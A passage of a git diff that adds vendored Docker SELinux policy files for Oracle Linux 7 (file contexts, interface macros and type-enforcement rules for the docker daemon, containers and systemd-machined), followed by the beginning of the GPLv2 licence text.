gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) + +/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) + +/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) + +/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) + +# OL7.2 systemd selinux update +/var/run/systemd/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_run_t,s0) +/var/lib/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_lib_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if new file mode 100644 index 0000000000..4780af05f7 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if @@ -0,0 +1,659 @@ + +## The open-source application container engine. + +######################################## +## +## Execute docker in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_domtrans',` + gen_require(` + type docker_t, docker_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_exec_t, docker_t) +') + +######################################## +## +## Execute docker in the caller domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_exec',` + gen_require(` + type docker_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_exec_t) +') + +######################################## +## +## Search docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_search_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + files_search_var_lib($1) +') + +######################################## +## +## Execute docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + can_exec($1, docker_var_lib_t) +') + +######################################## +## +## Read docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Read docker share files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_share_files',` + gen_require(` + type docker_share_t; + ') + + files_search_var_lib($1) + list_dirs_pattern($1, docker_share_t, docker_share_t) + read_files_pattern($1, docker_share_t, docker_share_t) + read_lnk_files_pattern($1, docker_share_t, docker_share_t) +') + +###################################### +## +## Allow the specified domain to execute docker shared files +## in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_share_files',` + gen_require(` + type docker_share_t; + ') + + can_exec($1, docker_share_t) +') + +######################################## +## +## Manage docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) + manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Manage docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_dirs',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Create objects in a docker var lib directory +## with an automatic type transition to +## a specified private type. +## +## +## +## Domain allowed access. +## +## +## +## +## The type of the object to create. +## +## +## +## +## The class of the object to be created. +## +## +## +## +## The name of the object being created. +## +## +# +interface(`docker_lib_filetrans',` + gen_require(` + type docker_var_lib_t; + ') + + filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) +') + +######################################## +## +## Read docker PID files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_pid_files',` + gen_require(` + type docker_var_run_t; + ') + + files_search_pids($1) + read_files_pattern($1, docker_var_run_t, docker_var_run_t) +') + +######################################## +## +## Execute docker server in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_systemctl',` + gen_require(` + type docker_t; + type docker_unit_file_t; + ') + + systemd_exec_systemctl($1) + init_reload_services($1) + systemd_read_fifo_file_passwd_run($1) + allow $1 docker_unit_file_t:file read_file_perms; + allow $1 docker_unit_file_t:service manage_service_perms; + + ps_process_pattern($1, docker_t) +') + +######################################## +## +## Read and write docker shared memory. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_rw_sem',` + gen_require(` + type docker_t; + ') + + allow $1 docker_t:sem rw_sem_perms; +') + +####################################### +## +## Read and write the docker pty type. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_use_ptys',` + gen_require(` + type docker_devpts_t; + ') + + allow $1 docker_devpts_t:chr_file rw_term_perms; +') + +####################################### +## +## Allow domain to create docker content +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_filetrans_named_content',` + + gen_require(` + type docker_var_lib_t; + type docker_share_t; + type docker_log_t; + type docker_var_run_t; + type docker_home_t; + ') + + files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") + files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") + files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") + logging_log_filetrans($1, docker_log_t, dir, "lxc") + files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") + userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") +') + +######################################## +## +## Connect to docker over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_stream_connect',` + gen_require(` + type docker_t, docker_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) +') + +######################################## +## +## Connect to SPC containers over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_stream_connect',` + gen_require(` + type spc_t, spc_var_run_t; + ') + + files_search_pids($1) + files_write_all_pid_sockets($1) + allow $1 spc_t:unix_stream_socket connectto; +') + +######################################## +## +## All of the rules required to administrate +## an docker environment +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_admin',` + gen_require(` + type docker_t; + type docker_var_lib_t, docker_var_run_t; + type docker_unit_file_t; + type docker_lock_t; + type docker_log_t; + type docker_config_t; + ') + + allow $1 docker_t:process { ptrace signal_perms }; + ps_process_pattern($1, docker_t) + + admin_pattern($1, docker_config_t) + + files_search_var_lib($1) + admin_pattern($1, docker_var_lib_t) + + files_search_pids($1) + admin_pattern($1, docker_var_run_t) + + files_search_locks($1) + admin_pattern($1, docker_lock_t) + + logging_search_logs($1) + admin_pattern($1, docker_log_t) + + docker_systemctl($1) + admin_pattern($1, docker_unit_file_t) + allow $1 docker_unit_file_t:service all_service_perms; + + optional_policy(` + systemd_passwd_agent_exec($1) + systemd_read_fifo_file_passwd_run($1) + ') +') + +######################################## +## +## Execute docker_auth_exec_t in the docker_auth domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_auth_domtrans',` + gen_require(` + type docker_auth_t, docker_auth_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) +') + +###################################### +## +## Execute docker_auth in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_exec',` + gen_require(` + type docker_auth_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_auth_exec_t) +') + +######################################## +## +## Connect to docker_auth over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_stream_connect',` + gen_require(` + type docker_auth_t, docker_plugin_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) +') + +######################################## +## +## docker domain typebounds calling domain. +## +## +## +## Domain to be typebound. +## +## +# +interface(`docker_typebounds',` + gen_require(` + type docker_t; + ') + + typebounds docker_t $1; +') + +######################################## +## +## Allow any docker_exec_t to be an entrypoint of this domain +## +## +## +## Domain allowed access. +## +## +## +# +interface(`docker_entrypoint',` + gen_require(` + type docker_exec_t; + ') + allow $1 docker_exec_t:file entrypoint; +') + +######################################## +## +## Send and receive messages from +## systemd machined over dbus. +## +## +## +## Domain allowed access. +## +## +# +interface(`systemd_dbus_chat_machined',` + gen_require(` + type systemd_machined_t; + class dbus send_msg; + ') + + allow $1 systemd_machined_t:dbus send_msg; + allow systemd_machined_t $1:dbus send_msg; + ps_process_pattern(systemd_machined_t, $1) +') + +######################################## +## +## Allow any svirt_sandbox_file_t to be an entrypoint of this domain +## +## +## +## Domain allowed access. +## +## +## +# +interface(`virt_sandbox_entrypoint',` + gen_require(` + type svirt_sandbox_file_t; + ') + allow $1 svirt_sandbox_file_t:file entrypoint; +') + +######################################## +## +## Send and receive messages from +## virt over dbus. +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_dbus_chat',` + gen_require(` + type virtd_t; + class dbus send_msg; + ') + + allow $1 virtd_t:dbus send_msg; + allow virtd_t $1:dbus send_msg; + ps_process_pattern(virtd_t, $1) +') + +####################################### +## +## Read the process state of virt sandbox containers +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_sandbox_read_state',` + gen_require(` + attribute svirt_sandbox_domain; + ') + + ps_process_pattern($1, svirt_sandbox_domain) +') + +###################################### +## +## Send a signal to sandbox domains +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_signal_sandbox',` + gen_require(` + attribute svirt_sandbox_domain; + ') + + allow $1 svirt_sandbox_domain:process signal; +') + +####################################### +## +## Getattr Sandbox File systems +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_getattr_sandbox_filesystem',` + gen_require(` + type svirt_sandbox_file_t; + ') + + allow $1 svirt_sandbox_file_t:filesystem getattr; +') + +####################################### +## +## Read Sandbox Files +## +## +## +## Domain allowed access. +## +## +# +interface(`virt_read_sandbox_files',` + gen_require(` + type svirt_sandbox_file_t; + ') + + list_dirs_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) + read_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) + read_lnk_files_pattern($1, svirt_sandbox_file_t, svirt_sandbox_file_t) +') + +####################################### +## +## Read the process state of spc containers +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_read_state',` + gen_require(` + type spc_t; + ') + + ps_process_pattern($1, spc_t) +') + diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te new file mode 100644 index 0000000000..d4de36fe46 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te @@ -0,0 +1,465 @@ +policy_module(docker, 1.0.0) + +######################################## +# +# Declarations +# + +## +##

+## Determine whether docker can +## connect to all TCP ports. +##

+##
+gen_tunable(docker_connect_any, false) + +type docker_t; +type docker_exec_t; +init_daemon_domain(docker_t, docker_exec_t) +domain_subj_id_change_exemption(docker_t) +domain_role_change_exemption(docker_t) + +type spc_t; +domain_type(spc_t) +role system_r types spc_t; + +type docker_auth_t; +type docker_auth_exec_t; +init_daemon_domain(docker_auth_t, docker_auth_exec_t) + +type spc_var_run_t; +files_pid_file(spc_var_run_t) + +type docker_var_lib_t; +files_type(docker_var_lib_t) + +type docker_home_t; +userdom_user_home_content(docker_home_t) + +type docker_config_t; +files_config_file(docker_config_t) + +type docker_lock_t; +files_lock_file(docker_lock_t) + +type docker_log_t; +logging_log_file(docker_log_t) + +type docker_tmp_t; +files_tmp_file(docker_tmp_t) + +type docker_tmpfs_t; +files_tmpfs_file(docker_tmpfs_t) + +type docker_var_run_t; +files_pid_file(docker_var_run_t) + +type docker_plugin_var_run_t; +files_pid_file(docker_plugin_var_run_t) + +type docker_unit_file_t; +systemd_unit_file(docker_unit_file_t) + +type docker_devpts_t; +term_pty(docker_devpts_t) + +type docker_share_t; +files_type(docker_share_t) + +# OL7 systemd selinux update +type systemd_machined_t; +type systemd_machined_exec_t; +init_daemon_domain(systemd_machined_t, systemd_machined_exec_t) + +# /run/systemd/machines +type systemd_machined_var_run_t; +files_pid_file(systemd_machined_var_run_t) + +# /var/lib/machines +type systemd_machined_var_lib_t; +files_type(systemd_machined_var_lib_t) + + +######################################## +# +# docker local policy +# +allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; +allow docker_t self:tun_socket relabelto; +allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; +allow docker_t self:fifo_file rw_fifo_file_perms; +allow docker_t self:unix_stream_socket create_stream_socket_perms; +allow docker_t self:tcp_socket create_stream_socket_perms; +allow docker_t self:udp_socket create_socket_perms; +allow docker_t self:capability2 block_suspend; + +docker_auth_stream_connect(docker_t) + +manage_files_pattern(docker_t, docker_home_t, docker_home_t) +manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) +manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) +userdom_admin_home_dir_filetrans(docker_t, docker_home_t, dir, ".docker") + +manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) +manage_files_pattern(docker_t, docker_config_t, docker_config_t) +files_etc_filetrans(docker_t, docker_config_t, dir, "docker") + +manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) +manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) +files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") + +manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) +manage_files_pattern(docker_t, docker_log_t, docker_log_t) +manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) +logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) +allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; + +manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +allow docker_t docker_tmpfs_t:dir relabelfrom; +can_exec(docker_t, docker_tmpfs_t) +fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) +allow docker_t docker_tmpfs_t:chr_file mounton; + +manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) +manage_files_pattern(docker_t, docker_share_t, docker_share_t) +manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) +allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; + +can_exec(docker_t, docker_share_t) +#docker_filetrans_named_content(docker_t) + +manage_dirs_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; +files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) + +allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; +term_create_pty(docker_t, docker_devpts_t) + +kernel_read_system_state(docker_t) +kernel_read_network_state(docker_t) +kernel_read_all_sysctls(docker_t) +kernel_rw_net_sysctls(docker_t) +kernel_setsched(docker_t) +kernel_read_all_proc(docker_t) + +domain_use_interactive_fds(docker_t) +domain_dontaudit_read_all_domains_state(docker_t) + +corecmd_exec_bin(docker_t) +corecmd_exec_shell(docker_t) + +corenet_tcp_bind_generic_node(docker_t) +corenet_tcp_sendrecv_generic_if(docker_t) +corenet_tcp_sendrecv_generic_node(docker_t) +corenet_tcp_sendrecv_generic_port(docker_t) +corenet_tcp_bind_all_ports(docker_t) +corenet_tcp_connect_http_port(docker_t) +corenet_tcp_connect_commplex_main_port(docker_t) +corenet_udp_sendrecv_generic_if(docker_t) +corenet_udp_sendrecv_generic_node(docker_t) +corenet_udp_sendrecv_all_ports(docker_t) +corenet_udp_bind_generic_node(docker_t) +corenet_udp_bind_all_ports(docker_t) + +files_read_config_files(docker_t) +files_dontaudit_getattr_all_dirs(docker_t) +files_dontaudit_getattr_all_files(docker_t) + +fs_read_cgroup_files(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_search_all(docker_t) +fs_getattr_all_fs(docker_t) + +storage_raw_rw_fixed_disk(docker_t) + +auth_use_nsswitch(docker_t) +auth_dontaudit_getattr_shadow(docker_t) + +init_read_state(docker_t) +init_status(docker_t) + +logging_send_audit_msgs(docker_t) +logging_send_syslog_msg(docker_t) + +miscfiles_read_localization(docker_t) + +mount_domtrans(docker_t) + +seutil_read_default_contexts(docker_t) +seutil_read_config(docker_t) + +sysnet_dns_name_resolve(docker_t) +sysnet_exec_ifconfig(docker_t) + +optional_policy(` + rpm_exec(docker_t) + rpm_read_db(docker_t) + rpm_exec(docker_t) +') + +optional_policy(` + fstools_domtrans(docker_t) +') + +optional_policy(` + iptables_domtrans(docker_t) +') + +optional_policy(` + openvswitch_stream_connect(docker_t) +') + +# +# lxc rules +# + +allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; + +allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; + +allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; +allow docker_t self:netlink_audit_socket create_netlink_socket_perms; +allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; +allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; + +allow docker_t docker_var_lib_t:dir mounton; +allow docker_t docker_var_lib_t:chr_file mounton; +can_exec(docker_t, docker_var_lib_t) + +kernel_dontaudit_setsched(docker_t) +kernel_get_sysvipc_info(docker_t) +kernel_request_load_module(docker_t) +kernel_mounton_messages(docker_t) +kernel_mounton_all_proc(docker_t) +kernel_mounton_all_sysctls(docker_t) +kernel_unlabeled_entry_type(spc_t) +kernel_unlabeled_domtrans(docker_t, spc_t) + +dev_getattr_all(docker_t) +dev_getattr_sysfs_fs(docker_t) +dev_read_urand(docker_t) +dev_read_lvm_control(docker_t) +dev_rw_sysfs(docker_t) +dev_rw_loop_control(docker_t) +dev_rw_lvm_control(docker_t) + +files_getattr_isid_type_dirs(docker_t) +files_manage_isid_type_dirs(docker_t) +files_manage_isid_type_files(docker_t) +files_manage_isid_type_symlinks(docker_t) +files_manage_isid_type_chr_files(docker_t) +files_manage_isid_type_blk_files(docker_t) +files_exec_isid_files(docker_t) +files_mounton_isid(docker_t) +files_mounton_non_security(docker_t) +files_mounton_isid_type_chr_file(docker_t) + +fs_mount_all_fs(docker_t) +fs_unmount_all_fs(docker_t) +fs_remount_all_fs(docker_t) +files_mounton_isid(docker_t) +fs_manage_cgroup_dirs(docker_t) +fs_manage_cgroup_files(docker_t) +fs_relabelfrom_xattr_fs(docker_t) +fs_relabelfrom_tmpfs(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_list_hugetlbfs(docker_t) + +term_use_generic_ptys(docker_t) +term_use_ptmx(docker_t) +term_getattr_pty_fs(docker_t) +term_relabel_pty_fs(docker_t) +term_mounton_unallocated_ttys(docker_t) + +modutils_domtrans_insmod(docker_t) + +systemd_status_all_unit_files(docker_t) +systemd_start_systemd_services(docker_t) + +userdom_stream_connect(docker_t) +userdom_search_user_home_content(docker_t) +userdom_read_all_users_state(docker_t) +userdom_relabel_user_home_files(docker_t) +userdom_relabel_user_tmp_files(docker_t) +userdom_relabel_user_tmp_dirs(docker_t) + +optional_policy(` + gpm_getattr_gpmctl(docker_t) +') + +optional_policy(` + dbus_system_bus_client(docker_t) + init_dbus_chat(docker_t) + init_start_transient_unit(docker_t) + + optional_policy(` + systemd_dbus_chat_logind(docker_t) + systemd_dbus_chat_machined(docker_t) + ') + + optional_policy(` + firewalld_dbus_chat(docker_t) + ') +') + +optional_policy(` + udev_read_db(docker_t) +') + +optional_policy(` + unconfined_domain(docker_t) + # unconfined_typebounds(docker_t) +') + +optional_policy(` + virt_read_config(docker_t) + virt_exec(docker_t) + virt_stream_connect(docker_t) + virt_stream_connect_sandbox(docker_t) + virt_exec_sandbox_files(docker_t) + virt_manage_sandbox_files(docker_t) + virt_relabel_sandbox_filesystem(docker_t) + # for lxc + virt_transition_svirt_sandbox(docker_t, system_r) + virt_mounton_sandbox_file(docker_t) +# virt_attach_sandbox_tun_iface(docker_t) + allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; + virt_sandbox_entrypoint(docker_t) +') + +tunable_policy(`docker_connect_any',` + corenet_tcp_connect_all_ports(docker_t) + corenet_sendrecv_all_packets(docker_t) + corenet_tcp_sendrecv_all_ports(docker_t) +') + +######################################## +# +# spc local policy +# +allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; +role system_r types spc_t; + +domtrans_pattern(docker_t, docker_share_t, spc_t) +domtrans_pattern(docker_t, docker_var_lib_t, spc_t) +allow docker_t spc_t:process { setsched signal_perms }; +ps_process_pattern(docker_t, spc_t) +allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; +filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") + +optional_policy(` + systemd_dbus_chat_machined(spc_t) +') + +optional_policy(` + dbus_chat_system_bus(spc_t) +') + +optional_policy(` + unconfined_domain_noaudit(spc_t) +') + +optional_policy(` + virt_transition_svirt_sandbox(spc_t, system_r) + virt_sandbox_entrypoint(spc_t) +') + +######################################## +# +# docker_auth local policy +# +allow docker_auth_t self:fifo_file rw_fifo_file_perms; +allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; +dontaudit docker_auth_t self:capability net_admin; + +docker_stream_connect(docker_auth_t) + +manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) + +domain_use_interactive_fds(docker_auth_t) + +kernel_read_net_sysctls(docker_auth_t) + +auth_use_nsswitch(docker_auth_t) + +files_read_etc_files(docker_auth_t) + +miscfiles_read_localization(docker_auth_t) + +sysnet_dns_name_resolve(docker_auth_t) + +######################################## +# +# OL7.2 systemd selinux update +# systemd_machined local policy +# +allow systemd_machined_t self:capability { dac_override setgid sys_admin sys_chroot sys_ptrace }; +allow systemd_machined_t systemd_unit_file_t:service { status start }; +allow systemd_machined_t self:unix_dgram_socket create_socket_perms; + +manage_dirs_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) +manage_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) +manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_run_t, systemd_machined_var_run_t) +init_pid_filetrans(systemd_machined_t, systemd_machined_var_run_t, dir, "machines") + +manage_dirs_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) +manage_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) +manage_lnk_files_pattern(systemd_machined_t, systemd_machined_var_lib_t, systemd_machined_var_lib_t) +init_var_lib_filetrans(systemd_machined_t, systemd_machined_var_lib_t, dir, "machines") + +kernel_dgram_send(systemd_machined_t) +# This is a bug, but need for now. +kernel_read_unlabeled_state(systemd_machined_t) + +init_dbus_chat(systemd_machined_t) +init_status(systemd_machined_t) + +userdom_dbus_send_all_users(systemd_machined_t) + +term_use_ptmx(systemd_machined_t) + +optional_policy(` + dbus_connect_system_bus(systemd_machined_t) + dbus_system_bus_client(systemd_machined_t) +') + +optional_policy(` + docker_read_share_files(systemd_machined_t) + docker_spc_read_state(systemd_machined_t) +') + +optional_policy(` + virt_dbus_chat(systemd_machined_t) + virt_sandbox_read_state(systemd_machined_t) + virt_signal_sandbox(systemd_machined_t) + virt_stream_connect_sandbox(systemd_machined_t) + virt_rw_svirt_dev(systemd_machined_t) + virt_getattr_sandbox_filesystem(systemd_machined_t) + virt_read_sandbox_files(systemd_machined_t) +') + + diff --git a/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE new file mode 100644 index 0000000000..5b6e7c66c2 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE @@ -0,0 +1,340 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc. + 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Library General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then 